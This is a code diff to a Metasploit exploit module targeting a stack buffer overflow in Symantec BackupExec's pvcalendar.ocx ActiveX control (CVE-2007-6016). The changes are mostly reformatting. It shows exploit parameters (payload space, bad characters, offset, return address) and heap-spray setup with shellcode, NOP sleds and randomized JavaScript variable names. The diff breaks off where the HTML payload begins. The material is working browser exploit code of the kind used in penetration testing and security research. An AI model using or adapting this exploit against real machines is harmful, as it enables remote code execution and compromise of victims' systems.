@@ -9,40 +9,45 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpServer::HTML
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Symantec BackupExec Calendar Control Buffer Overflow',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Symantec BackupExec Calendar Control Buffer Overflow',
+        'Description' => %q{
           This module exploits a stack buffer overflow in Symantec BackupExec Calendar Control.
-        By sending an overly long string to the "_DOWText0" property located
-        in the pvcalendar.ocx control, an attacker may be able to execute
-        arbitrary code.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         => [ 'Elazar Broad <elazarb[at]earthlink.net>' ],
-      'References'     =>
-        [
+          By sending an overly long string to the "_DOWText0" property located
+          in the pvcalendar.ocx control, an attacker may be able to execute
+          arbitrary code.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'Elazar Broad <elazarb[at]earthlink.net>' ],
+        'References' => [
           [ 'CVE', '2007-6016' ],
           [ 'OSVDB', '42358'],
           [ 'BID', '26904' ],
           [ 'URL', 'http://web.archive.org/web/20080302192347/http://secunia.com:80/advisories/27885/' ],
         ],
-      'DefaultOptions' =>
-        {
+        'DefaultOptions' => {
           'EXITFUNC' => 'process',
         },
-      'Payload'        =>
-        {
-          'Space'         => 800,
-          'BadChars'      => "\x00\x09\x0a\x0d'\\",
+        'Payload' => {
+          'Space' => 800,
+          'BadChars' => "\x00\x09\x0a\x0d'\\",
           'StackAdjustment' => -3500,
         },
-      'Platform'       => 'win',
-      'Targets'        =>
-        [
+        'Platform' => 'win',
+        'Targets' => [
           [ 'Windows XP SP0-SP2 / IE 6.0 SP0-2 & IE 7.0 English', { 'Offset' => 256, 'Ret' => 0x0A0A0A0A } ]
         ],
-      'DisclosureDate' => '2008-02-28',
-      'DefaultTarget'  => 0))
+        'DisclosureDate' => '2008-02-28',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
   end
 
   def autofilter
@@ -61,27 +66,27 @@ class MetasploitModule < Msf::Exploit::Remote
     shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
 
     # Setup exploit buffers
-    nops 	  = Rex::Text.to_unescape(make_nops(4))
-    ret  	  = Rex::Text.uri_encode([target.ret].pack('L'))
+    nops = Rex::Text.to_unescape(make_nops(4))
+    ret = Rex::Text.uri_encode([target.ret].pack('L'))
     blocksize = 0x30000
-    fillto    = 400
-    offset 	  = target['Offset']
-    junk	  = rand_text_alpha(4)
+    fillto = 400
+    offset = target['Offset']
+    junk = rand_text_alpha(4)
 
     # Randomize the javascript variable names
-    pvcalendar   = rand_text_alpha(rand(100) + 1)
-    j_shellcode  = rand_text_alpha(rand(100) + 1)
-    j_nops       = rand_text_alpha(rand(100) + 1)
+    pvcalendar = rand_text_alpha(rand(100) + 1)
+    j_shellcode = rand_text_alpha(rand(100) + 1)
+    j_nops = rand_text_alpha(rand(100) + 1)
     j_headersize = rand_text_alpha(rand(100) + 1)
     j_slackspace = rand_text_alpha(rand(100) + 1)
-    j_fillblock  = rand_text_alpha(rand(100) + 1)
-    j_block      = rand_text_alpha(rand(100) + 1)
-    j_memory     = rand_text_alpha(rand(100) + 1)
-    j_counter    = rand_text_alpha(rand(30) + 2)
-    j_ret        = rand_text_alpha(rand(100) + 1)
-    j_junk       = rand_text_alpha(rand(100) + 1)
-    j_filename   = rand_text_alpha(rand(16) + 1)
-    randnop      = rand_text_alpha(rand(100) + 1)
+    j_fillblock = rand_text_alpha(rand(100) + 1)
+    j_block = rand_text_alpha(rand(100) + 1)
+    j_memory = rand_text_alpha(rand(100) + 1)
+    j_counter = rand_text_alpha(rand(30) + 2)
+    j_ret = rand_text_alpha(rand(100) + 1)
+    j_junk = rand_text_alpha(rand(100) + 1)
+    j_filename = rand_text_alpha(rand(16) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Build out the message
     content = %Q|<html>
